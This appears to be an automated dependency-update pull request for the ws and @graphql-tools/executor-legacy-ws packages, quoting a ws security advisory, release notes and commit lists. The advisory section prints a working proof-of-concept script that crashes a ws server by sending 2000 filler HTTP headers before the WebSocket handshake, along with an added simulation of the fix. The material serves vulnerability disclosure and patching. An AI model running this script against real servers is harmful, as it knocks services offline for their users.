[Security] Bump ws and @graphql-tools/executor-legacy-ws
Bumps ws and @graphql-tools/executor-legacy-ws. These dependencies needed to be updated together.
Updates ws from 8.13.0 to 8.18.0. This update includes a security fix.
Vulnerabilities fixed
ws affected by a DoS when handling a request with many HTTP headers
Impact
A request with a number of headers exceeding the `server.maxHeadersCount` threshold could be used to crash a ws server.

Proof of concept
The advisory excerpt is cut off here; the full script appears in the 8.17.1 release notes below.

```js
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
```

... (truncated)
Patched versions: 8.17.1
Affected versions: >= 8.0.0, < 8.17.1
Release notes
Sourced from ws's releases.
8.18.0
Features
- Added support for `Blob` (#2229).

8.17.1
Bug fixes
- Fixed a DoS vulnerability (#2231).
A request with a number of headers exceeding the `server.maxHeadersCount` threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

// Start a ws server on an ephemeral port and send it one request
// from the same process once it is listening.
const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  // Build 2000 distinct two-character header names, each with a dummy value.
  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  // The WebSocket handshake headers come after the 2000 filler headers.
  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.
... (truncated)
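The commit list below names the fix as "Fix crash when the Upgrade header cannot be read". As an added example (not ws's or the advisory's own code), the following models that failure chain without opening a socket: Node's HTTP parser drops header fields beyond `server.maxHeadersCount`, so the handshake headers sent after 2000 filler headers never reach `req.headers`, and a check that dereferences `headers.upgrade` without a guard throws. The `parseHeaders` stand-in for Node's limit, the two check functions and the constructed request are illustrative simplifications, not the library's code.

```javascript
// Added example, not ws's own code. It models the failure chain behind the
// ws 8.17.1 fix: Node's HTTP parser silently drops header fields once a
// request carries more than server.maxHeadersCount (default 2000), so a late
// Upgrade header never reaches req.headers and an unguarded check throws.

// Constructed stand-in for Node's limit: keep the first `maxHeadersCount`
// fields and drop the rest (0 means "no limit", as in Node itself).
function parseHeaders(fields, maxHeadersCount = 2000) {
  const headers = {};
  let kept = 0;
  for (const [name, value] of fields) {
    if (maxHeadersCount > 0 && kept >= maxHeadersCount) break;
    headers[name.toLowerCase()] = value; // Node lowercases header names
    kept++;
  }
  return headers;
}

// Pre-fix shape of the check: assumes the Upgrade header is present.
function isWebSocketUpgradeUnsafe(method, headers) {
  return method === 'GET' && headers.upgrade.toLowerCase() === 'websocket';
}

// Hardened shape: a missing header means "not an upgrade"; nothing throws.
function isWebSocketUpgradeSafe(method, headers) {
  const upgrade = headers.upgrade;
  return method === 'GET' && upgrade !== undefined &&
    upgrade.toLowerCase() === 'websocket';
}

// Constructed request modelled on the advisory's proof of concept:
// 2000 junk header fields followed by the WebSocket handshake headers.
function buildFloodRequest(junkCount = 2000) {
  const fields = [];
  for (let i = 0; i < junkCount; i++) fields.push([`x-j${i}`, 'x']);
  fields.push(['Connection', 'Upgrade'], ['Upgrade', 'websocket'],
    ['Sec-WebSocket-Key', 'dGhlIHNhbXBsZSBub25jZQ=='],
    ['Sec-WebSocket-Version', '13']);
  return fields;
}

// Feed the flood through the limit and report what each check does.
function simulate(check, maxHeadersCount = 2000) {
  const headers = parseHeaders(buildFloodRequest(), maxHeadersCount);
  try {
    return { accepted: check('GET', headers), crashed: false };
  } catch (e) {
    return { accepted: false, crashed: e instanceof TypeError };
  }
}
```

With the default limit the unguarded check reports a TypeError while the hardened one simply rejects the request; with the limit disabled (0) all headers survive and the handshake is recognised.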
Commits
- 976c53c [dist] 8.18.0
- 59b9629 [feature] Add support for `Blob` (#2229)
- 0d1b5e6 [security] Use more descriptive text for 2017 vulnerability link
- 15f11a0 [security] Add new DoS vulnerability to SECURITY.md
- 3c56601 [dist] 8.17.1
- e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
- 6a00029 [test] Increase code coverage
- ddfe4a8 [perf] Reduce the amount of `crypto.randomFillSync()` calls
- b73b118 [dist] 8.17.0
- 29694a5 [test] Use the `highWaterMark` variable
- Additional commits viewable in compare view
Updates @graphql-tools/executor-legacy-ws from 1.0.1 to 1.0.6

Changelog

Sourced from @graphql-tools/executor-legacy-ws's changelog.
1.0.6

Patch Changes

- #5913 83c0af0 Thanks @enisdenjo! - dependencies updates:
  - Updated dependency `@graphql-tools/utils@^10.0.13` (from `^10.0.0`, in dependencies)

1.0.5

Patch Changes

- #5762 701cfd3 Thanks @renovate! - dependencies updates:
  - Updated dependency `ws@8.15.0` (from `8.14.2`, in dependencies)

1.0.4

Patch Changes

- #5603 6c26c4fb Thanks @renovate! - dependencies updates:
  - Updated dependency `ws@8.14.2` (from `8.14.1`, in dependencies)

1.0.3

Patch Changes

- #5575 b1531913 Thanks @renovate! - dependencies updates:
  - Updated dependency `ws@8.14.1` (from `8.14.0`, in dependencies)

1.0.2

Patch Changes

- #5570 4f6f5642 Thanks @renovate! - dependencies updates:
  - Updated dependency `ws@8.14.0` (from `8.13.0`, in dependencies)
Commits
- f59d7d7 chore(release): update monorepo packages versions (#5929)
- 83c0af0 No unnecessary inline fragment spreads for union types in federation and link...
- a3259da chore(release): update monorepo packages versions (#5763)
- 38a92ab Use ranged dependencies
- 701cfd3 fix(deps): update dependency ws to v8.15.0 (#5762)
- 1bd71cd chore(release): update monorepo packages versions (#5631)
- 6c26c4f chore(deps): update all non-major dependencies (#5603)
- 291b37b chore(release): update monorepo packages versions (#5577)
- b153191 fix(deps): update all non-major dependencies (#5575)
- b8b8164 chore(release): update monorepo packages versions (#5571)
- Additional commits viewable in compare view